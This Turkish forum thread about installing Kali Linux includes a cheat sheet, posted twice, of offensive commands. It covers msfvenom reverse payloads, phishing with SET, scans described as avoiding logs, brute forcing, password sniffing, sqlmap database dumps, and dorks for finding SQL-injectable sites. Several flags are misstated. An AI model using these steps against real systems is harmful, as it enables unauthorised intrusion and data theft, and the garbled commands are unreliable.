Çözüldü Kali Linux nasıl kurulur?

Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Çözüm
1-) VMware kullaniyorsan bunu, VirtualBox kullaniyorsan bunu indir.
2-) Indirdigin dosyayi sanal makine uzerine ekle.
3-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
4-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.

Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.
KS
KS
NightWist

NightWist

Hectopat
Katılım
16 Mayıs 2019
Mesajlar
2.446
Çözümler
6
Yer
Boşluk
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.

Kali Linux.

Metasploit-Framework ile penetrasyon testi:

Msfconsole >>> metasploit çalıştırır.

Show (payloads-exploits) >>> payload veya exploitleri görüntüler.

Msfvenom -p (payload adı) lhost=(IP adresiniz) lport=(herhangi bir 4 haneli sayı girin) -f (format) > (dosyaadi).(format)

Search (kelime) >>> aramak istediğiniz kelimeyi girin.

Use (exploit-payload adı)>>> exploit veya payloada girer.

Show options >>> ayarları görüntüler.

Run >>> tarama yapar.

Bağlantı kurulduğunda meterpreter konsolu açılır.

Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz.

Maltego ile sorgu;

Maltego >>> maltegoyu çalıştırır.

Sosyal mühendislik.

Setoolkit >>> sosyal mühendislik kitini çalıştırır.

Phishing vb yapabilirsiniz.

Site zaafiyet taraması:

1-)fierce ile keşif yapma;

Fierce -h >>> yardım almak için kullanılır.

Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır.

2-)wapiti ile tarama;

Wapiti -u (sitelinki) >>> XSS veya SQL açığı bulursa bildirecektir.

3-)owaspzap;

Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.

4-)dirb ile admin panel bulma;

Dirb (sitelinki) >>> admin panel bulmak için kullanılır genelde.

5-)nmap ile site zaafiyet taraması yapma;

İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından.

Nmap (sitelinki) >>> genel tarama yapar.

Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar.

Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar.

Nmap -o -a -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar.

Nmap -o -a -SS -il (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar.

6-) whois ile site bilgilerini öğrenme;

Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar.

Wordlist oluşturma.

1-)normal wordlist oluşturma;

Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt

Örnek;

Crunch 8 8 1234567890abcdefg -o liste.txt

2-)sözlük (site) wordlisti oluşturma;

Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)

Örnek;

Cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste.

3-) kişiye yönelik wordlist oluşturma;

İlk önce cupp aracını indiriyoruz.

Apt install cupp.

Ardından.

Cupp -i

Sonra gereken bilgileri veriyoruz ve wordlist hazır.

Bruteforce saldırısı yapma.

1-)Hydra ile SSL destekli sitelere saldırma;

Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz.

(Başka araçlarda var GitHub'ta mevcut)

Ağ izleme.

1-) Wireshark ile ağ izleme;

Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(detaylı adli bilişim aracıdır vaktinizi alabilir)

2-)kismet ile ağınızda kim var kim yok kontrol edin;

Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)

3-) ettercap ile ağ izleme:

Ettercap -g >>> ettercapı başlatır.

Site sömürgecilik.

1-)sqlmap ile site sömürgesi;

Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır.

Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır.

Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır.

Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir.

Bu sadece SQL açıklı sitelerde geçerlidir.

SQL açıklı site nasıl bulunur?

Google'da dork aratarak bulabilirsiniz.

Dorkları kendiniz yapsanız daha etkili sonuç alırsınız.

Hazır dorklar;

İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=

Sitede SQL açığı olduğunu nasıl anlarız?

Site linkinin sonuna (') işaretini koyarız eğer varsa;

Mysql_ ifadesi geçen bir hata alırız.

Bilgisayarınızı bir web sunucusu yapın!

Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat

Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.

/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya.

İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.

Örnek;

192.168.0.1/login.html

Kali Linux genel komutlar:

Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır.

Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır.

Ls >> dizin içeriğini görüntüler.

CD (klasör) >> klasöre girer.

CD. >> klasörden çıkar.

Sudo >>> root değilken root işlem yapmayı sağlar.

Passwd (kullanıcı adı) >>> şifre değiştirir.

Apt-get Update >> Kali Linux paketlerini yükseltir.

Apt-get upgrade >> Kali Linux paketlerini günceller.

Apt install (paketadı) >> paket yükler.

Apt-get install --reinstall (paket adı) >>> paketi baştan kurar.

Chmod +X (dosyaadi) >> dosyaya izin verir.

Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.

Chown -r root (dosyaismi) >> root yetkisi verir.

Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar.

Mv (dosyaadi) (tasinacak dizin) >> dosya taşır.

ZIP (dosyaadi) >> dosyayı arşivler.

Unzip (dosyaadi) >> dosyayı arşivden çıkarır.

Openvpn (dosyaismi) >>> VPN açar.

Kali Linux IP değiştirme.

İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler.

Yeni terminal açıp;

CD /etc/network/ >>> dizinine giriyoruz.

Nano interfaces >>> dosyayı düzenleyeceğiz.

&(En alt satıra inin)&

İface (ağ geçidiniz) inet static.
(Tabbasın)address (istediğiniz IP adresi yazın)
(Tabbasın)netmask (ilk terminalde yazanı yaz)
(Tabbasın)broadcast (ilk terminalde yazanı yaz)
(Tabbasın)gateway (modem arayüz ipnizi yazın)

CTRL+X basın sonra (y) basın ve enterlayın.

Reboot yazın >>> sistemi yeniden başlatır.

İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)

Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.

Websploit.

Apt install websploit >>> websploit aracını kurar.

Websploit >>> websploit aracını çalıştırır.

Show modules >>> tüm modülleri gösterir.

Use (modül adı) >>> modüle girer.

Options >>> ayarları görüntüler.

Help >>> yardım almak için kullanılır.

Set (ayar) >>> ayarları düzenler.

Execute >>> başlatır.

Termineter kullanımı.

Apt install termineter >>> termineteri yükler.

Termineter >>> termineteri başlatır.

Show modules >>> modülleri görüntüler.

Use (modül) >>> modüle girer.

Show options >>> ayarları görüntüler.

Set (ayar) >>> ayar değiştirir.

Help >>> yardım almak için kullanılır.

Run >>> modülü başlatır.

Lynis ile sistem güvenlik taraması.

Git clone (indirme linki)>>> lynis aracını GitHub deposundan indiriyoruz.

/Lynis audit System >>> tarama başlatır.

Wpscan ile WordPress site taraması;

Wpscan --URL (sitelinki.com)

Bu aralar siber güvenliği araştırıyorum giriş yapmak istiyorum hangi Linux'u kullanacağımda karasız kalmıştım Kali kullansam olur mu?
 

kitty_assassin

Hectopat
Katılım
16 Ocak 2018
Mesajlar
253
Makaleler
1
Çözümler
4
Yer
Night City
Aynen kardeşim tek işim Linux'ta heçkırlık yapmak.



Denemek istiyorum Linux Mint, Pardus ve Kali Linux arasında kaldım.
Bilgisayarınıza VirtualBox indirdikten sonra Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution sitesinden Download'a basıp Virtual Machines kısmına basıyorsunuz. Aşağıda 64bit 32 bit seçme yeri var sağ taraftakini indirmeniz gerekiyor dosya uzantısı .ova olacak. Ondan sonra VirtualBox'a giriyorsunuz. Sekmelerden "New" diyip isim kısmına Kali Linux yazın otomatik olarak Linux olarak ayarlayacak sistemi. Linux'u oluşturduktan sonra oluşturduğunuz sistemi açın açılırken sizden dosya seçmenizi isteyecek. Bu noktada .ova uzantılı dosyayı seçmeniz gerekiyor. Artık kullanıma hazır sanal bir işletim sistemine sahipsiniz.
Not : En az 2048 MB ram kullanmanızı tavsiye ederim ve eğer Extension hatası verirse VirtualBox eklenti paketini kurmanız gerekiyor onun için de Downloads – Oracle VM VirtualBox sitesinde ortalara doğru Extension Pack diye bir indirme var onu indirip programda File>Preferenceres>Extensions kısmına gelip sağ kısımdan + işaretine basıp indirdiğiniz dosyayı aktarmanız gerekiyor.
 

Emre kırkaya

Centipat
Katılım
29 Mart 2020
Mesajlar
84
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.

Kali Linux

METASPLOİT-Framework İLE PENETRASYON TESTİ:

Msfconsole >>> metasploit çalıştırır

Show (payloads-exploits) >>> Payload veya Exploitleri görüntüler

Msfvenom -p (payload adı) LHOST=(IP adresiniz) LPORT=(HERHANGİ BİR 4 HANELİ SAYI GİRİN) -f (format) > (dosyaadi).(format)

Search (kelime) >>> aramak istediğiniz kelimeyi girin

Use (exploit-payload adı)>>> exploit veya payloada girer

Show options >>> ayarları görüntüler

Run >>> tarama yapar

Bağlantı Kurulduğunda Meterpreter Konsolu Açılır

Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz

Maltego İle Sorgu;

Maltego >>> maltegoyu çalıştırır

SOSYAL MÜHENDİSLİK

Setoolkit >>> sosyal mühendislik kitini çalıştırır

Phishing vb yapabilirsiniz.

SİTE ZAAFİYET TARAMASI:

1-)Fierce İle Keşif Yapma;

Fierce -h >>> yardım almak için kullanılır

Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır

2-)Wapiti İle Tarama;

Wapiti -u (sitelinki) >>> XSS Veya SQL açığı bulursa bildirecektir.

3-)OwaspZap;

Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.

4-)Dirb İle Admin Panel Bulma;

Dirb (sitelinki) >>> Admin Panel Bulmak için Kullanılır Genelde

5-)Nmap İle Site Zaafiyet Taraması Yapma;

İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından

Nmap (sitelinki) >>> genel tarama yapar

Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar

Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar

Nmap -o -A -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar

Nmap -o -A -SS -iL (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar

6-) Whois İle Site Bilgilerini Öğrenme;

Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar

WORDLİST OLUŞTURMA

1-)Normal Wordlist Oluşturma;

Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt

Örnek;

Crunch 8 8 1234567890abcdefg -o liste.txt

2-)Sözlük (Site) Wordlisti Oluşturma;

Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)

Örnek;

Cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste

3-) Kişiye Yönelik Wordlist Oluşturma;

İlk önce cupp aracını indiriyoruz

Apt install cupp

Ardından

Cupp -i

Sonra gereken bilgileri veriyoruz ve wordlist hazır

BRUTEFORCE SALDIRISI YAPMA

1-)Hydra İle SSL Destekli Sitelere Saldırma;

Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz

(Başka Araçlarda Var GitHub'ta mevcut)

AĞ İZLEME

1-) Wireshark İle Ağ İzleme;

Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP Stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(Detaylı Adli Bilişim Aracıdır Vaktinizi Alabilir)

2-)Kismet İle Ağınızda Kim Var Kim Yok Kontrol Edin;

Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)

3-) Ettercap İle Ağ İzleme:

Ettercap -g >>> ettercapı başlatır

SİTE SÖMÜRGECİLİK

1-)SQLMap İle Site Sömürgesi;

Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır

Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır

Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır

Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir

Bu sadece SQL açıklı sitelerde geçerlidir.

SQL açıklı site nasıl bulunur?

Google'da dork aratarak bulabilirsiniz

Dorkları kendiniz yapsanız daha etkili sonuç alırsınız

Hazır Dorklar;

İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=

Sitede SQL açığı olduğunu nasıl anlarız?

Site linkinin sonuna (') işaretini koyarız eğer varsa;

Mysql_ ifadesi geçen bir hata alırız

BilgisayarINIZI BİR WEB SUNUCUSU YAPIN!

Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat

Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.

/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya

İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.

Örnek;

192.168.0.1/login.html

Kali Linux GENEL KOMUTLAR:

Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır

Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır

Ls >> dizin içeriğini görüntüler

CD (klasör) >> klasöre girer

CD. >> klasörden çıkar

Sudo >>> root değilken root işlem yapmayı sağlar

Passwd (kullanıcı adı) >>> şifre değiştirir

Apt-get Update >> Kali Linux paketlerini yükseltir

Apt-get upgrade >> Kali Linux paketlerini günceller

Apt install (paketadı) >> paket yükler

Apt-get install --reinstall (paket adı) >>> paketi baştan kurar

Chmod +X (dosyaadi) >> dosyaya izin verir

Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.

Chown -r root (dosyaismi) >> root yetkisi verir

Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar

Mv (dosyaadi) (tasinacak dizin) >> dosya taşır

ZIP (dosyaadi) >> dosyayı arşivler

Unzip (dosyaadi) >> dosyayı arşivden çıkarır

Openvpn (dosyaismi) >>> VPN açar

Kali Linux İP DEĞİŞTİRME

İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler

Yeni Terminal Açıp;

CD /etc/network/ >>> dizinine giriyoruz

Nano interfaces >>> dosyayı düzenleyeceğiz

&(En Alt Satıra İnin)&

İface (ağ geçidiniz) inet static
(TabBasın)address (istediğiniz IP adresi yazın)
(TabBasın)netmask (ilk terminalde yazanı yaz)
(TabBasın)broadcast (ilk terminalde yazanı yaz)
(TabBasın)gateway (modem arayüz ipnizi yazın)

CTRL+X basın Sonra (Y) Basın ve Enterlayın

Reboot yazın >>> sistemi yeniden başlatır

İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)

Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.

WEBSPLOİT

Apt install websploit >>> websploit aracını kurar

Websploit >>> websploit aracını çalıştırır

Show modules >>> tüm modülleri gösterir

Use (modül adı) >>> modüle girer

Options >>> ayarları görüntüler

Help >>> yardım almak için kullanılır

Set (ayar) >>> ayarları düzenler

Execute >>> başlatır

TERMİNETER KULLANIMI

Apt install termineter >>> termineteri yükler

Termineter >>> termineteri başlatır

Show modules >>> modülleri görüntüler

Use (modül) >>> modüle girer

Show options >>> ayarları görüntüler

Set (ayar) >>> ayar değiştirir

Help >>> yardım almak için kullanılır

Run >>> modülü başlatır

Lynis İle Sistem Güvenlik Taraması

Git clone (indirme linki)>>> Lynis aracını GitHub deposundan indiriyoruz

/Lynis audit System >>> tarama başlatır

WPScan ile WordPress Site Taraması;

Wpscan --URL (sitelinki.com)

Benim de işime yarar eyvallah
 
Yukarı